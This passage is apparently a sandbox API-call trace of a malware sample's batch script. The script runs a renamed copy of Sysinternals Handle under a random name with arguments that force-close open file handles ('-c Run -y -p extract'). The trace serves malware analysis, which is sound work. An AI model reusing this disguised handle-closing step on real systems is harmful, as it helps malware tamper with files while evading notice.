lpNumberOfCharsWritten=0x24f0ec*=0x26) returned 1 [0221.345] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f10c | out: _Buffer=") ") returned 2 [0221.345] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.345] GetFileType (hFile=0x3c) returned 0x2 [0221.345] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.345] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0221.347] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.347] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x2) returned 1 [0221.348] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f120 | out: _Buffer="\r\n") returned 2 [0221.348] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.348] GetFileType (hFile=0x3c) returned 0x2 [0221.348] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.348] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0f8 | out: lpMode=0x24f0f8) returned 1 [0221.349] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.349] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f110, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f110*=0x2) returned 1 [0221.354] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0221.354] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0221.354] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0221.354] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0221.354] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0221.354] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0221.354] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0221.354] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x24f048, _Radix=0 | out: _EndPtr=0x24f048*=",6 delims=: \"") returned 3 [0221.354] wcstol (in: _String="6 delims=: \"", _EndPtr=0x24f048, _Radix=0 | out: _EndPtr=0x24f048*=" delims=: \"") returned 6 [0221.354] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0221.354] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0221.354] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0221.354] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0221.354] _wpopen (_Command="vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner", _Mode="rb") returned 0x77981268 [0221.362] feof (_File=0x77981268) returned 0 [0221.362] ferror (_File=0x77981268) returned 0 [0221.362] fgets (in: _Buf=0x43eb80, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0260.974] feof (_File=0x77981268) returned 0 [0260.975] ferror (_File=0x77981268) returned 0 [0260.975] fgets (in: _Buf=0x43ebc6, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0260.975] feof (_File=0x77981268) returned 0 [0260.975] ferror (_File=0x77981268) returned 0 [0260.975] fgets (in: _Buf=0x43d599, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0266.671] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0266.672] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x43d599, cbMultiByte=73, lpWideCharStr=0x43d550, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0266.672] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24ed28 | out: _Buffer="\r\n") returned 2 [0266.672] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.672] GetFileType (hFile=0x3c) returned 0x2 [0266.672] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.672] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ed00 | out: lpMode=0x24ed00) returned 1 [0266.673] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.673] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24ed18, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24ed18*=0x2) returned 1 [0266.673] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.673] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24ed24 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0266.673] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x24ed24 | out: _Buffer=">") returned 1 [0266.673] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.673] GetFileType (hFile=0x3c) returned 0x2 [0266.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.673] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ed04 | out: lpMode=0x24ed04) returned 1 [0266.674] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.674] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24ed1c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x24ed1c*=0x1e) returned 1 [0266.676] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.676] GetFileType (hFile=0x3c) returned 0x2 [0266.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.677] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24efa4 | out: lpMode=0x24efa4) returned 1 [0266.677] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.677] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24efbc, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x24efbc*=0x1) returned 1 [0266.677] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.677] GetFileType (hFile=0x3c) returned 0x2 [0266.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.677] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ef94 | out: lpMode=0x24ef94) returned 1 [0266.678] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.678] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x448608*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x24efac, lpReserved=0x0 | out: lpBuffer=0x448608*, lpNumberOfCharsWritten=0x24efac*=0xc) returned 1 [0266.678] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24efb4 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0266.678] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.678] GetFileType (hFile=0x3c) returned 0x2 [0266.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.678] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ef8c | out: lpMode=0x24ef8c) returned 1 [0266.678] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.678] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x24efa4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24efa4*=0x2c) returned 1 [0266.679] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24efc4 | out: _Buffer=") ") returned 2 [0266.679] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.679] GetFileType (hFile=0x3c) returned 0x2 [0266.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.679] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ef9c | out: lpMode=0x24ef9c) returned 1 [0266.679] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.679] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24efb4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24efb4*=0x2) returned 1 [0266.679] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24efd8 | out: _Buffer="\r\n") returned 2 [0266.679] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.679] GetFileType (hFile=0x3c) returned 0x2 [0266.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.679] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24efb0 | out: lpMode=0x24efb0) returned 1 [0266.680] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.680] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24efc8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24efc8*=0x2) returned 1 [0266.680] GetConsoleTitleW (in: lpConsoleTitle=0x24eaf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.680] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0266.681] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0266.682] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0266.682] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0266.682] SetErrorMode (uMode=0x0) returned 0x0 [0266.682] SetErrorMode (uMode=0x1) returned 0x0 [0266.682] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43f910, lpFilePart=0x24e5fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24e5fc*="Desktop") returned 0x1d [0266.683] SetErrorMode (uMode=0x0) returned 0x1 [0266.683] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.683] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.683] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.683] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x24e3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e3a8) returned 0x43d808 [0266.683] FindClose (in: hFindFile=0x43d808 | out: hFindFile=0x43d808) returned 1 [0266.742] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0266.742] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0266.742] GetConsoleTitleW (in: lpConsoleTitle=0x24e87c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.743] InitializeProcThreadAttributeList (in: lpAttributeList=0x24e7a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24e78c | out: lpAttributeList=0x24e7a8, lpSize=0x24e78c) returned 1 [0266.743] UpdateProcThreadAttribute (in: lpAttributeList=0x24e7a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x24e794, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24e7a8, lpPreviousValue=0x0) returned 1 [0266.743] GetStartupInfoW (in: lpStartupInfo=0x24e7e0 | out: lpStartupInfo=0x24e7e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"jnw", _MaxCount=0x7) returned -3 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.743] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0266.744] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0266.744] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0266.744] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x24e730*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24e77c | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x24e77c*(hProcess=0xb8, hThread=0xcc, dwProcessId=0x2dc, dwThreadId=0x5a0)) returned 1 [0266.750] CloseHandle (hObject=0xcc) returned 1 [0266.750] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0266.750] GetEnvironmentStringsW () returned 0x43e060* [0266.750] FreeEnvironmentStringsA (penv="=") returned 1 [0266.750] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0269.820] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x24e714 | out: lpExitCode=0x24e714*=0x1) returned 1 [0269.820] CloseHandle (hObject=0xb8) returned 1 [0269.820] _vsnwprintf (in: _Buffer=0x24e7fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24e71c | out: _Buffer="00000001") returned 8 [0269.820] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0269.821] GetEnvironmentStringsW () returned 0x43e060* [0269.821] FreeEnvironmentStringsA (penv="=") returned 1 [0269.821] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0269.821] GetEnvironmentStringsW () returned 0x43e060* [0269.821] FreeEnvironmentStringsA (penv="=") returned 1 [0269.821] DeleteProcThreadAttributeList (in: lpAttributeList=0x24e7a8 | out: lpAttributeList=0x24e7a8) [0269.821] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.821] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0269.821] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.821] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0269.822] _get_osfhandle (_FileHandle=0) returned 0x38 [0269.822] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0269.822] SetConsoleInputExeNameW () returned 0x1 [0269.822] GetConsoleOutputCP () returned 0x1b5 [0269.822] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0269.822] SetThreadUILanguage (LangId=0x0) returned 0x409 [0269.822] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f0dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0269.823] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0269.823] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.823] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0269.823] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.823] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0269.823] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0x0, lpOverlapped=0x0) returned 1 [0269.824] GetLastError () returned 0x0 [0269.824] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.824] GetFileType (hFile=0xb8) returned 